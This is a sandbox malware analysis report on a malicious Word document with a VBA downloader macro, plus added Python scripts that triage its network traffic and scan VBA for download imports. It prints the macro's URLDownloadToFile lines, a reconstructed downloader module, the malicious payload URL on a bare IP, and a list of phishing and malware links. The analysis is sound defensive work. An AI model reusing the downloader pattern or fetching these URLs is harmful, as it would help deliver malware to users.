
Analysis Report VERDI.doc

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 193292
Start date: 03.12.2019
Start time: 06:44:51
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: VERDI.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.expl.winDOC@1/13@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, wisptis.exe
  • Execution Graph export aborted for target WINWORD.EXE, PID 3656 because there are no executed functions
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy   Score  Range    Reporting  Whitelisted  Detection
Threshold  84     0 - 100             false        malicious

Confidence

Strategy   Score  Range  Further Analysis Required?  Confidence
Threshold  5      0 - 5  false


Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior.



Mitre Att&ck Matrix

Techniques are listed per tactic. The number after a technique is the counter the report shows next to it (reproduced as shown); techniques without a number are the matrix's placeholder entries that did not match any signature.

Initial Access: Valid Accounts, Replication Through Removable Media, External Remote Services
Execution: Scripting (11), Graphical User Interface (1), Exploitation for Client Execution (12)
Persistence: Winlogon Helper DLL, Port Monitors, Accessibility Features
Privilege Escalation: Process Injection (1), Accessibility Features, Path Interception
Defense Evasion: Masquerading (1), Process Injection (1), Scripting (11)
Credential Access: Credential Dumping, Network Sniffing, Input Capture
Discovery: Process Discovery (1), File and Directory Discovery (1), System Information Discovery (1)
Lateral Movement: Remote File Copy (4), Remote Services, Windows Remote Management
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive
Exfiltration: Data Compressed, Exfiltration Over Other Network Medium, Automated Exfiltration
Command and Control: Standard Non-Application Layer Protocol (2), Standard Application Layer Protocol (12), Remote File Copy (4)
Impact: Data Destruction, Data Encrypted for Impact, Disk Structure Wipe

Signature Overview



AV Detection:

Antivirus detection for URL or domain
  Source: http://192.119.106.235/mswordupd.tmp, Avira URL Cloud: Label: malware
Antivirus detection for sample
  Source: VERDI.doc, Avira: detection malicious, Label: W97M/Dldr.Sload.xgajl
Multi AV Scanner detection for domain / URL
  Source: http://192.119.106.235/mswordupd.tmp, Virustotal: Detection: 14%
Multi AV Scanner detection for submitted file
  Source: VERDI.doc, Virustotal: Detection: 42%
Machine Learning detection for sample
  Source: VERDI.doc, Joe Sandbox ML: detected

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll, origin: URLDownloadToFileA
Potential document exploit detected (performs HTTP gets)
  Source: global traffic, TCP traffic: 192.168.2.2:49220 -> 192.119.106.235:80
Potential document exploit detected (unknown TCP traffic)
  Source: global traffic, TCP traffic: 192.168.2.2:49220 -> 192.119.106.235:80

Networking:

Uses a known web browser user agent for HTTP communication
  Source: global traffic, HTTP traffic detected:
    GET /mswordupd.tmp HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 192.119.106.235
    Connection: Keep-Alive
Connects to IPs without corresponding DNS lookups
  Source: unknown, TCP traffic detected without corresponding DNS query: 192.119.106.235 (reported 10 times)
Downloads files
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
  Source: global traffic, HTTP traffic detected: GET /mswordupd.tmp HTTP/1.1 (same request and headers as listed above)
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
  Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 03 Dec 2019 05:45:47 GMT
    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
    Content-Length: 211
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 73 77 6f 72 64 75 70 64 2e 74 6d 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested
Urls found in memory or binary data
  Source: WINWORD.EXE, 00000000.00000002.2483706116.00283000.00000004.00000020.sdmp, WINWORD.EXE, 00000000.00000002.2496450329.09750000.00000004.00000040.sdmp, String found in binary or memory: http://192.119.106.235/mswordupd.tmp
  Source: WINWORD.EXE, 00000000.00000002.2487583935.031F5000.00000004.00000001.sdmp, String found in binary or memory: http://ns.ad
  Source: WINWORD.EXE, 00000000.00000002.2487583935.031F5000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adbe.
  Source: WINWORD.EXE, 00000000.00000002.2487566677.031DD000.00000004.00000001.sdmp, String found in binary or memory: http://pur/elements/1.1/xmphttp://nsom/xap/1.0/xmpidqhttp://nsom/xmp/Identifier/qual/1.0/shttp://ns.
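The three network signatures above (connects to a bare IP with no DNS query, an Internet Explorer user agent sent by WINWORD.EXE, and a GET for a .tmp resource answered with 404) can be reproduced from the raw evidence the report prints. The Python below is an added example and not part of the Joe Sandbox report: the GET request, the response headers and the response body (recovered from the report's Data Raw hex dump) are copied from the report; the event list is constructed, with the ten DNS-less connects to 192.119.106.235 as reported and one hypothetical resolved-then-connected pair on 203.0.113.10 as the control case. The list of payload-disguising extensions and the WINWORD.EXE process attribution are assumptions, not report fields.

```python
"""Triage of the network evidence in the Networking section (added example, not Joe Sandbox code)."""
import ipaddress
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Constructed event list: the ten connects with no DNS query are what the report shows;
# the 203.0.113.10 pair (RFC 5737 test address) is a hypothetical control case.
EVENTS = [
    ("dns", "update.example.invalid", "203.0.113.10"),   # hypothetical: name resolved first
    ("connect", "203.0.113.10", 443),                    # ...so this connect is expected
] + [("connect", "192.119.106.235", 80)] * 10           # from the report: no DNS precedes these

REQUEST = (                                              # copied from the report
    "GET /mswordupd.tmp HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E)\r\n"
    "Host: 192.119.106.235\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

RESPONSE_HEAD = (                                        # copied from the report
    "HTTP/1.1 404 Not Found\r\n"
    "Date: Tue, 03 Dec 2019 05:45:47 GMT\r\n"
    "Server: Apache/2.4.6 (CentOS) PHP/5.4.16\r\n"
    "Content-Length: 211\r\n"
    "Keep-Alive: timeout=5, max=100\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n\r\n"
)

# The report's 'Data Raw' hex dump of the response body, verbatim (whitespace is ignored by fromhex).
RESPONSE_BODY_HEX = """
3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a
3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a
3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a
3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a
3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a
3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 73 77 6f 72 64 75 70 64 2e 74 6d 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a
3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
"""


def parse_http(message: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP message into start line, lower-cased header dict and body."""
    head, _, body = message.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    headers = {}
    for hl in header_lines:
        name, _, value = hl.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def connects_without_dns(events) -> List[Tuple[str, int]]:
    """The 'Connects to IPs without corresponding DNS lookups' check: a connect is
    suspicious when no earlier DNS answer returned that address. Hard-coded IPs in
    droppers leave nothing in DNS logs and bypass DNS-based blocking."""
    resolved, hits = set(), []
    for ev in events:
        if ev[0] == "dns":
            resolved.add(ev[2])
        elif ev[0] == "connect" and ev[1] not in resolved:
            hits.append((ev[1], ev[2]))
    return hits


def triage_request(request: str, process: str = "WINWORD.EXE") -> List[str]:
    """Flag what makes this GET alert-worthy when it originates from an Office process."""
    start, headers, _ = parse_http(request)
    _method, path, _version = start.split(" ", 2)
    findings = []
    host = urlsplit("//" + headers.get("host", "")).hostname   # strips port / IPv6 brackets
    try:
        ipaddress.ip_address(host)
        findings.append(f"Host header is a literal IP ({host}); nothing for DNS controls to see")
    except ValueError:
        pass
    if "MSIE" in headers.get("user-agent", "") and not process.lower().startswith("iexplore"):
        findings.append(f"{process} sent an Internet Explorer user agent: WinINET/URLMon download, not a browser")
    name = path.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in {"tmp", "dat", "bin", "txt", "jpg"}:               # assumed list of payload-disguising extensions
        findings.append(f"payload requested under a non-executable extension: {path}")
    return findings


def triage_response(head: str, body_hex: str) -> Dict[str, object]:
    """Recover the body from the hex dump and confirm what the server said. A 404 here
    means the second stage was never fetched, which is why the Analysis Advice warns
    the sample will show less behaviour than it is capable of."""
    status, headers, _ = parse_http(head)
    body = bytes.fromhex(body_hex)
    ctype = headers.get("content-type", "")
    charset = ctype.split("charset=", 1)[1].strip() if "charset=" in ctype else "latin-1"
    m = re.search(r"requested URL (\S+) was not found", body.decode(charset))
    code = int(status.split(" ", 2)[1])
    return {
        "status": code,
        "length_ok": int(headers.get("content-length", -1)) == len(body),
        "missing_resource": m.group(1) if m else None,
        "second_stage_retrieved": code == 200,
    }


if __name__ == "__main__":
    print("connects without DNS:", connects_without_dns(EVENTS))
    for f in triage_request(REQUEST):
        print("request:", f)
    print("response:", triage_response(RESPONSE_HEAD, RESPONSE_BODY_HEX))
```

Run as a script it prints the ten DNS-less connects, three request findings and the decoded 404 (211 bytes, matching Content-Length, naming /mswordupd.tmp as the missing resource). The practical point is that a detection built on this traffic has to fire on the request itself; waiting for a successful download would have missed this run entirely.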

System Summary:

Document contains an embedded VBA macro with suspicious strings
  Source: VERDI.doc, OLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long (listed twice)
  Source: VERDI.doc, OLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long (listed twice)
  Source: VERDI.doc, OLE, VBA macro line: URLDownloadToFile 0, v1, v2, 0, 0
  Source: VBA code instrumentation, OLE, VBA macro: Module Module1, Function Jbrw23, String urldownloadtofile: URLDownloadToFile 0, v1, v2, 0, 0, Name: Jbrw23
Document contains embedded VBA macros
  Source: VERDI.doc, OLE indicator, VBA macros: true
Document contains no OLE stream with summary information
  Source: VERDI.doc, OLE indicator has summary info: false (listed twice)
Document has an unknown application name
  Source: VERDI.doc, OLE indicator application name: unknown (listed twice)
Classification label
  Source: classification engine, Classification label: mal84.expl.winDOC@1/13@0/1
Creates files inside the user directory
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$VERDI.doc
Creates temporary files
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user~1\AppData\Local\Temp\CVR8CE3.tmp
Document contains summary information with irregular field values
  Source: VERDI.doc, OLE document summary: title field not present or empty (listed twice)
  Source: VERDI.doc, OLE document summary: author field not present or empty (listed twice)
  Source: VERDI.doc, OLE document summary: edited time not present or 0 (listed twice)
Reads ini files
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File read: C:\Users\desktop.ini
Sample is known by Antivirus
  Source: VERDI.doc, Virustotal: Detection: 42%
Executable creates window controls seldom found in malware
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Window found: window name: SysTabControl32
Uses Rich Edit Controls
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\system32\MSFTEDIT.DLL
Found graphical window changes (likely an installer)
  Source: Window Recorder, Window detected: More than 3 window changes detected
Document is a ZIP file with path names indicative of goodware
  Source: VERDI.doc, Initial sample: OLE zip file path = word/media/image1.wmf
  Source: VERDI.doc, Initial sample: OLE zip file path = word/media/image4.jpeg
Checks if Microsoft Office is installed
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
  Source: Binary string: scrrun.pdb source: WINWORD.EXE, 00000000.00000002.2492702224.065F0000.00000002.00000001.sdmp
  Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE, 00000000.00000002.2487995411.03AE0000.00000002.00000001.sdmp
Document has a 'vbamacros' value indicative of goodware
  Source: VERDI.doc, Initial sample: OLE indicators vbamacros = False
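The macro evidence in this section comes with a caveat: the report's two macro indicators disagree ("VBA macros: true" against "OLE indicators vbamacros = False"), and the word/media/ zip paths show that the .doc is really an OOXML (ZIP) container, which Word opens by content sniffing regardless of the extension. The quoted Declare and call lines are the evidence to trust. The Python below is an added example (not Joe Sandbox, Avira or oletools code) that performs the same check statically: it resolves VBA Declare statements to lib!export pairs, flags imports on a watch-list and reports where they are actually called. The macro text is reconstructed from the lines the report quotes; the #If VBA7 branching (the usual reason a module carries both a PtrSafe and a plain Declare of the same function), the function parameters and the Attribute line are assumptions, and the watch-list beyond urlmon!URLDownloadToFileA is an assumed extension.

```python
"""Static triage of the VBA quoted in the report (added example, not Joe Sandbox/oletools code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Reconstructed from the report: both Declare forms, module Module1, function Jbrw23 and
# the call line are quoted there; the #If VBA7 wrapper, the parameter list and the
# Attribute line are assumptions that tie those lines into one compilable module.
MACRO = '''\
Attribute VB_Name = "Module1"
#If VBA7 Then
Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Function Jbrw23(v1, v2)
    ' v1 = URL, v2 = local path (assumed from URLDownloadToFileA's argument order)
    URLDownloadToFile 0, v1, v2, 0, 0
End Function
'''

# Declare [PtrSafe] Function|Sub <name> Lib "<lib>" [Alias "<export>"] ...
DECLARE_RE = re.compile(
    r'^\s*(?:(?:Public|Private)\s+)?Declare\s+(?P<ptrsafe>PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(?P<name>\w+)\s+Lib\s+"(?P<lib>[^"]+)"(?:\s+Alias\s+"(?P<export>[^"]+)")?',
    re.IGNORECASE,
)

# Assumed watch-list of Win32 exports a document macro has no business importing.
# Only urlmon!URLDownloadToFileA is evidenced by this report.
SUSPICIOUS_IMPORTS: Dict[Tuple[str, str], str] = {
    ("urlmon", "urldownloadtofilea"): "download a file from a URL",
    ("urlmon", "urldownloadtofilew"): "download a file from a URL",
    ("shell32", "shellexecutea"): "launch a program",
    ("kernel32", "createprocessa"): "launch a program",
    ("kernel32", "virtualalloc"): "allocate executable memory (shellcode)",
    ("kernel32", "createthread"): "run shellcode",
}


@dataclass
class Finding:
    line_no: int
    kind: str        # "suspicious-import" or "api-call"
    detail: str


def _normalise_lib(lib: str) -> str:
    lib = lib.lower()
    return lib[:-4] if lib.endswith(".dll") else lib


def scan_vba(source: str) -> List[Finding]:
    """Resolve Declare statements to lib!export, flag watch-listed imports, and report
    every later line that calls one of the declared names."""
    findings: List[Finding] = []
    imported: Dict[str, Tuple[str, str]] = {}      # VBA name (lower) -> (lib, export)
    for no, line in enumerate(source.splitlines(), 1):
        code = line.split("'", 1)[0]              # drop a trailing VBA comment (no string-literal handling)
        m = DECLARE_RE.match(code)
        if m:
            lib = _normalise_lib(m.group("lib"))
            export = (m.group("export") or m.group("name")).lower()
            imported[m.group("name").lower()] = (lib, export)
            if (lib, export) in SUSPICIOUS_IMPORTS:
                findings.append(Finding(no, "suspicious-import",
                    f"{lib}!{export}: {SUSPICIOUS_IMPORTS[(lib, export)]}"
                    f" (PtrSafe={m.group('ptrsafe') is not None})"))
            continue
        for vba_name, (lib, export) in imported.items():
            if re.search(rf"\b{re.escape(vba_name)}\b", code, re.IGNORECASE):
                findings.append(Finding(no, "api-call", f"{vba_name} -> {lib}!{export}: {code.strip()}"))
    return findings


def is_downloader(findings: List[Finding]) -> bool:
    """True when a download import is actually called; a Declare that is never
    invoked is dead code, a called one is a live downloader."""
    return any(f.kind == "api-call" and "urldownloadtofile" in f.detail.lower() for f in findings)


if __name__ == "__main__":
    results = scan_vba(MACRO)
    for f in results:
        print(f"line {f.line_no:>2}  {f.kind:<18} {f.detail}")
    print("downloader:", is_downloader(results))
```

On the reconstructed module this reports both Declares (PtrSafe and plain) as watch-listed imports of urlmon!URLDownloadToFileA and the single call in Jbrw23 as the live download. For a real container, extract vbaProject.bin first (olevba from oletools does this); the scanner above shows the logic that turns a Declare into a lib!export indicator and separates a dead Declare from a call that fires.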

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX (reported 73 times)

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
  Source: WINWORD.EXE, 00000000.00000002.2483869243.00540000.00000002.00000001.sdmp, Binary or memory string: Program Manager
  Source: WINWORD.EXE, 00000000.00000002.2483869243.00540000.00000002.00000001.sdmp, Binary or memory string: Progman
  Source: WINWORD.EXE, 00000000.00000002.2483869243.00540000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd

Behavior Graph

(Graph not reproduced in this export. Its legend distinguishes: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.)

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
VERDI.doc | 43% | Virustotal |
VERDI.doc | 100% | Avira | W97M/Dldr.Sload.xgajl
VERDI.doc | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://192.119.106.235/mswordupd.tmp | 14% | Virustotal |
http://192.119.106.235/mswordupd.tmp | 100% | Avira URL Cloud | malware
http://pur/elements/1.1/xmphttp://nsom/xap/1.0/xmpidqhttp://nsom/xmp/Identifier/qual/1.0/shttp://ns. | 0% | Avira URL Cloud | safe
http://ns.adbe. | 0% | URL Reputation | safe
http://ns.ad | 0% | Virustotal |
http://ns.ad | 0% | URL Reputation | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match: unknown. Samples the report associates with the same ASN, with their detection and the IP they contacted:

Associated Sample Name / URL | Detection | Context
ORDER_IMAGES_20108.doc | malicious | 162.144.128.116
915.exe | malicious | 14.102.249.147
915.exe | malicious | 112.213.106.150
VM- 21-11-2019 - Missed Call.htm | malicious | 46.149.115.114
http://url7050.microsoftaccountactivities.com/wf/click?upn=4k2-2F1WrnSGbkq14RZIa3TyCnW7mzRsQmtY4-2F1ptosk9K24NM18HM-2Furnn9juKSAwdeScYIZAkNda1HtQpXEYTlpozzFRqjM1N5g-2FG3WbL3k-3D_5w-2BFcaNq82qXD2HgdzlE4rOAaUDin4UQptcww6LJZQPBIl-2BTp4nbAotUZSp0Io3602VK5YSrDvF7zQxMgo-2Bfo0pepZIcGwS9U3TRPiAh0uV90P-2BXl5L2wyRz76E7Exf-2BgREEboUp5n-2B3Yiqd91TAC2gRrnx1TFS0V9kH3ew0jLucFBYtIbIbKSiQZMVgrVg2w6-2BvD08FA0FFEIVkaoEe2gc-2BSj1UwcFX7kCGU0VwcWqRh6Nbg3WgcSjDn9RmisWtSn7OnMMYTTipRCov27PKbz-2BDSu8YXU-2BI32vGFO7sM0ss9PWksQAlwRk85-2FHMlsHyuJttqt2l0XqZUouk2SxmCSe7iZyRJAJp9asJ2x0fbv55GrIXvhSz-2BBcp1ag57EbWf2gwBrVrmihQ-2Bv4kh3PTdbjrd-2Bo41gwZsbpK8kwcKd9zDOM4pUe-2B9gBTPV-2FGwLFKWhqvsgJcUkTtmDhKygHXffa-2Fr6Sfiui5adNBugks-2FbT7heWDenP73C-2BXdjJDEnPwfQtwKzSIW7vpiG119WPxbTBsXCWs0sL1akAkOgmdtW1RWAGFWL1Te14zTscnE5YLOT7-2B4cRb90GhmC-2Fnsct7Lw-3D-3D | malicious | 167.89.115.56
http://2fa.com-token-auth.com/XYWNh0aW9uPWn9wZW4mcmaVjaXBpthZW50tX2lkPTUzaODckzNTA1MiZjYW1wYWlnubl9ydW5faWQ9MjU5NzM3MQ== | malicious | 54.88.231.54
http://2fa.com-token-auth.com/XYWNn0aW9uPWaNsaWNrJnbVybD1ocudHRwkczovL3NldY3sVyZWQtbG9naW4ubmV0nL3BhZ2VzL2YwZTVkNmE1YzMzNSZyZWNpcGllbnRfaWQ9NTM4OTM1MDUyJmNhbXBhaWduX3J1bl9pZD0yNTk3Mzcx | malicious | 35.156.37.214
FileZilla_3.45.1_win64_sponsored-setup.exe | malicious | 136.243.154.122
QPE-011219 UFKJ-021219.doc | malicious | 190.5.162.204
NF-8233 Medical report p2.doc | malicious | 205.144.171.72
http://r20.rs6.net/tn.jsp?f=001D1XLQE3ZjXzgwTs6nHI6RYbH3b4SXqPzGbZarKsffD47NA5r3pqgtDlFZ673V1vYrJvxWSNvvqLRQppp6LYUMi-22aIiEeVfSEb7Bc2ugrOAD9gcIuxWcnKx9Wa9sx8vs_0VAviwSBkj2D0DL1pHpKHSwFPU3g_f&c=h7JmDAAK_nA8eA-_jh3KFz7S9_PQyJS7Hyeema4LbJsgkde-Dn_nig==&ch=ZLeavC3pcNI1Oa87RpxBZ619N_MCFfplW1lvWq4GSLIxLv2FlcOCdg== | malicious | 208.75.122.11
INV0ICE_.EXE | malicious | 194.5.97.34
https://xurl.es/5d6r3 | malicious | 104.28.28.62
http://122.228.19.80 | malicious | 122.228.19.80
d.exe | malicious | 156.67.222.222
d.exe | malicious | 156.67.222.222
Document for review appraisal.exe | malicious | 194.35.114.15
https://shahrearwpd.com//#waterquality@gswater.com | malicious | 213.136.72.26
http://dl.drp.su/updates/beetle/driverpack-7za.exe | malicious | 87.117.239.150

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

(No screenshots are reproduced in this export.)